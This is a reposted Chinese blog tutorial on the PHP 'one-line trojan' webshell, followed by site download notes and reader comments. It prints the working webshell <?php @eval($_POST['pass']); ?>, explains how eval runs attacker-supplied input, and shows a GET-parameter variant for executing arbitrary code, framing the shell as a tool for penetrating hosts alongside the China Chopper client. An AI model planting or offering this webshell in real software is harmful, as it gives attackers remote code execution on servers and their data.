php 一句话木马深度解析

a85e7b573720fe6de5a0af5b9cf3a2aa.jpg

什么是一句话木马展开目录

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。我们可以利用一句话木马来对主机进行渗透操作,最常见的工具就是号称黑客之刃的中国菜刀。这里我们主要讲解 php 一句话木马,因为别的语言我也不会啊。

一句话木马示例展

<?php @eval($_POST['pass']); ?>
//pass密码

一句话木马原理

在这里我们可以看到他的核心参数就是 eval 函数,这个 eval 函数是干嘛的呢,我们通过 php 官网的文档可以得到以下信息。

//(PHP 4, PHP 5, PHP 7)
eval ( string $code ) : mixed //把字符串作为PHP代码执行

显然,原理已经很明了了,把字符串当做 php 代码来执行,再看一句话木马中 eval 函数传入的字符串是什么,他没有传入字符串,它传入的是一个自定义变量,$_POST,其实这里不止可以传入 $_POST,任何字符串都是可以传入的。

比如说我们传入 $_GET ['a'] 变量,这个文件名咱们假设是 test.php,那么我们只要访问 test.php?a = 要执行的代码就可以来执行任何代码了。

管理员设置 回复 可见隐藏内容

附件列表(2)

1.下载工具推荐使用BT或者磁力若下载出错,可使用百度网盘离线功能进行下载,若仍然无法下载,请在下方留言

2.下载时迅雷软件如提示‘任务错误,未知错误,敏感资源,违规内容,版权等等’都是迅雷屏蔽资源的表现,请仔细浏览下载帮助,依旧可以正常下载。

3.本站所有资源支持百度秒离线,支持百度网盘在线观看,不会使用的同学可以浏览下载帮助

4.下载的人越多下载速度越快,把资源分享给您的朋友可以大大提高下载速度。

CTRL+D快速收藏,欢迎常来喔

本文非本站原创:本篇文章内容均为转载,如有侵权请联系管理员进行删除。
原文地址: 《php 一句话木马深度解析》 发布于2021年8月13日

本文链接:php 一句话木马深度解析 - https://tx48.cn/509.html

本文标签:

相关推荐
发表评论

未显示?请点击刷新

10 评论
  • 2个月前 (09-01)
    表情支持一下,小木博客有你更精彩
  • 2个月前 (08-31)
    大佬
  • 2个月前 (08-18)
    大佬6666
  • 2个月前 (08-17)
    签到
  • 2个月前 (08-16)
    资源很给力啊表情
  • 2个月前 (08-16)
    表情看起来好像不错的样子
  • 2个月前 (08-16)
    表情支持一下,小木博客网有你更精彩
  • 2个月前 (08-15)
    感谢楼主表情,好人一生平安
  • 2个月前 (08-15)
    大佬6666
  • 2个月前 (08-14)
    新人报道表情学习一下